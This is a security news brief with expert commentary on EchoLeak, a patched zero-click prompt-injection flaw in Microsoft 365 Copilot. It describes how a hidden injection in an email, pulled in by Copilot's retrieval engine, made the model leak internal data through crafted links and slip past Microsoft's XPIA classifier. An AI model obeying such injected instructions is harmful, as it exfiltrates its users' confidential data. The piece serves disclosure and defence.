EchoLeak Microsoft Copilot vulnerability allowed zero-click data exfiltration; Microsoft patched the flaw, highlighting AI security risks.
Researchers from Aim Labs uncovered EchoLeak, the first known zero-click AI vulnerability in Microsoft 365 Copilot, allowing attackers to exfiltrate sensitive enterprise data without user interaction. Assigned CVE-2025-32711 and rated critical by Microsoft, the flaw exploited a class of issues known as LLM Scope Violations. The attack chain involves a hidden prompt injection embedded in a seemingly benign email, which is later retrieved by the Copilot’s Retrieval-Augmented Generation (RAG) engine and causes the large language model to leak internal data into crafted outbound links. Exploitation was made possible by trusted Microsoft domains such as Teams and SharePoint. Microsoft patched the issue server-side in May 2025 after its disclosure in January and confirmed there is no evidence of real-world exploitation.
Analysis by Our Experts:
EchoLeak exposes a critical design flaw in how large language models operate within enterprise AI assistants. The attack exploited prompt context injection without requiring clicks, demonstrating that indirect prompt influence alone is enough to cause data leakage. The fact that standard protective classifiers like Microsoft’s XPIA were bypassed using natural language indicates that existing detection systems are inadequate against advanced prompt obfuscation. While Microsoft mitigated the flaw before public exploitation, the structural risk remains: if AI systems retrieve unfiltered data across trusted domains, attackers need only craft a plausible message. EchoLeak confirms that prompt-level manipulation is now a viable method of data exfiltration and must be treated with the same severity as traditional software vulnerabilities.
Read the full article here.